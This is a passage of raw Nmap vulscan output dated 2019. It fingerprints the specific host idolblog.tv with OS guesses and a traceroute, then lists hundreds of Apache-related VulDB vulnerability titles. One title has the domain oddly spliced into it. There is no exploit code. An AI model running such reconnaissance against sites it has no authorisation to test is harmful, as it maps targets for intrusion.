4232| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
4233| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
4234| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
4235| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
4236| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
4237| [23281] Dovecot imap/pop3-login dovecot-auth DoS
4238| [23280] Dovecot Malformed APPEND Command DoS
4239| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
4240| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
4241| [5857] Linux pop3d Arbitrary Mail File Access
4242| [2471] akpop3d username SQL Injection
4243|_
4244Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4245Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
4246No exact OS matches for host (test conditions non-ideal).
4247Network Distance: 9 hops
4248
4249TRACEROUTE (using port 443/tcp)
4250HOP RTT ADDRESS
42511 171.31 ms 10.247.200.1
42522 172.57 ms 213.184.122.97
42533 171.35 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
42544 171.72 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
42555 172.02 ms bzq-114-65-2.cust.bezeqint.net (192.114.65.2)
42566 237.60 ms linx-224.retn.net (195.66.224.193)
42577 234.45 ms linx-224.retn.net (195.66.224.193)
42588 ...
42599 238.83 ms 89.248.174.131
4260
4261###########################################################################################################################################
4262Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:51 EDT
4263Nmap scan report for idolblog.tv (89.248.174.131)
4264Host is up (0.24s latency).
4265
4266PORT STATE SERVICE VERSION
4267443/tcp open ssl/ssl Apache httpd (SSL-only mode)
4268|_http-server-header: Apache/2
4269| vulscan: VulDB - https://vuldb.com:
4270| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
4271| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
4272| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
4273| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
4274| [134416] Apache Sanselan 0.97-incubator Loop denial of service
4275| [134415] Apache Sanselan 0.97-incubator Hang denial of service
4276| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
4277| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
4278| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4279| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4280| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
4281| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
4282| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
4283| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
4284| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
4285| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
4286| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
4287| [133750] Oracle Agile Recipe Management for Pharmaceuticals 9.3.3/9.3.4 Apache Commons FileUpload unknown vulnerability
4288| [133728] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
4289| [133644] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4290| [133643] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache HTTP Server denial of service
4291| [133640] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Commons FileUpload unknown vulnerability
4292| [133638] Oracle Healthcare Master Person Index 3.0/4.0 Apache Commons FileUpload unknown vulnerability
4293| [133614] Oracle Data Integrator 12.2.1.3.0 Apache Batik unknown vulnerability
4294| [133594] Oracle WebCenter Portal 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
4295| [133591] Oracle JDeveloper 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4296| [133590] Oracle Identity Analytics 11.1.1.5.8 Apache Commons FileUpload unknown vulnerability
4297| [133588] Oracle Endeca Information Discovery Integrator 3.2.0 Apache Commons FileUpload unknown vulnerability
4298| [133587] Oracle Data Integrator 11.1.1.9.0 Apache Groovy unknown vulnerability
4299| [133585] Oracle API Gateway 11.1.2.4.0 Apache Commons FileUpload unknown vulnerability
4300| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
4301| [133571] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache Commons FileUpload unknown vulnerability
4302| [133522] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache Tomcat unknown vulnerability
4303| [133520] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache HTTP Server denial of service
4304| [133518] Oracle Primavera Unifier up to 18.8 Apache Commons FileUpload unknown vulnerability
4305| [133508] Oracle Communications Instant Messaging Server 10.0.1 Apache Tomcat unknown vulnerability
4306| [133501] Oracle Communications Policy Management 12.1/12.2/12.3/12.4 Apache Struts 1 unknown vulnerability
4307| [133500] Oracle Communications Application Session Controller 3.7.1/3.8.0 Apache Tomcat unknown vulnerability
4308| [133493] Oracle Communications Pricing Design Center 11.1/12.0 Apache Log4j unknown vulnerability
4309| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
4310| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
4311| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
4312| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
4313| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
4314| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
4315| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
4316| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
4317| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
4318| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
4319| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
4320| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
4321| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
4322| [131859] Apache Hadoop up to 2.9.1 privilege escalation
4323| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
4324| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
4325| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
4326| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
4327| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
4328| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
4329| [130629] Apache Guacamole Cookie Flag weak encryption
4330| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
4331| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
4332| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
4333| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
4334| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
4335| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
4336| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
4337| [130123] Apache Airflow up to 1.8.2 information disclosure
4338| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
4339| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
4340| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
4341| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
4342| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4343| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4344| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4345| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
4346| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
4347| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
4348| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
4349| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
4350| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4351| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
4352| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
4353| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
4354| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
4355| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
4356| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4357| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
4358| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4359| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
4360| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
4361| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
4362| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
4363| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
4364| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
4365| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
4366| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
4367| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
4368| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
4369| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
4370| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
4371| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
4372| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
4373| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
4374| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
4375| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
4376| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
4377| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
4378| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
4379| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
4380| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
4381| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
4382| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
4383| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
4384| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
4385| [127007] Apache Spark Request Code Execution
4386| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
4387| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
4388| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
4389| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
4390| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
4391| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
4392| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
4393| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
4394| [126346] Apache Tomcat Path privilege escalation
4395| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
4396| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
4397| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
4398| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
4399| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
4400| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
4401| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
4402| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
4403| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
4404| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
4405| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
4406| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4407| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
4408| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
4409| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
4410| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
4411| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
4412| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
4413| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
4414| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
4415| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
4416| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
4417| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
4418| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
4419| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
4420| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
4421| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
4422| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
4423| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
4424| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
4425| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
4426| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
4427| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
4428| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
4429| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
4430| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
4431| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
4432| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
4433| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
4434| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
4435| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
4436| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
4437| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
4438| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
4439| [123197] Apache Sentry up to 2.0.0 privilege escalation
4440| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
4441| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
4442| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
4443| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
4444| [122800] Apache Spark 1.3.0 REST API weak authentication
4445| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
4446| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
4447| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
4448| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
4449| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
4450| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
4451| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
4452| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
4453| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
4454| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
4455| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
4456| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
4457| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
4458| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
4459| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
4460| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
4461| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
4462| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
4463| [121354] Apache CouchDB HTTP API Code Execution
4464| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
4465| [121143] Apache storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
4466| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
4467| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
4468| [120168] Apache CXF weak authentication
4469| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
4470| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
4471| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
4472| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
4473| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
4474| [119306] Apache MXNet Network Interface privilege escalation
4475| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
4476| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
4477| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
4478| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
4479| [118143] Apache NiFi activemq-client Library Deserialization denial of service
4480| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
4481| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
4482| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
4483| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
4484| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
4485| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
4486| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
4487| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
4488| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
4489| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
4490| [117115] Apache Tika up to 1.17 tika-server command injection
4491| [116929] Apache Fineract getReportType Parameter privilege escalation
4492| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
4493| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
4494| [116926] Apache Fineract REST Hand Parameter privilege escalation
4495| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
4496| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
4497| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
4498| [115883] Apache Hive up to 2.3.2 privilege escalation
4499| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
4500| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
4501| [115518] Apache Ignite 2.3 Deserialization privilege escalation
4502| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
4503| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
4504| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
4505| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
4506| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
4507| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
4508| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
4509| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
4510| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
4511| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
4512| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
4513| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
4514| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
4515| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
4516| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
4517| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
4518| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
4519| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
4520| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
4521| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
4522| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
4523| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
4524| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
4525| [113895] Apache Geode up to 1.3.x Code Execution
4526| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
4527| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
4528| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
4529| [113747] Apache Tomcat Servlets privilege escalation
4530| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
4531| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
4532| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
4533| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
4534| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
4535| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4536| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
4537| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4538| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
4539| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
4540| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
4541| [112885] Apache Allura up to 1.8.0 File information disclosure
4542| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
4543| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
4544| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
4545| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
4546| [112625] Apache POI up to 3.16 Loop denial of service
4547| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
4548| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
4549| [112339] Apache NiFi 1.5.0 Header privilege escalation
4550| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
4551| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
4552| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
4553| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
4554| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
4555| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
4556| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
4557| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
4558| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
4559| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
4560| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
4561| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
4562| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
4563| [112114] Oracle 9.1 Apache Log4j privilege escalation
4564| [112113] Oracle 9.1 Apache Log4j privilege escalation
4565| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
4566| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
4567| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
4568| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
4569| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
4570| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
4571| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
4572| [111556] Apache Geode up to idolblog.tv 1.2.x Secure Mode Parameter OQL privilege escalation
4573| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
4574| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
4575| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
4576| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
4577| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
4578| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
4579| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
4580| [110701] Apache Fineract Query Parameter sql injection
4581| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
4582| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
4583| [110393] Apple macOS up to 10.13.2 apache information disclosure
4584| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
4585| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
4586| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
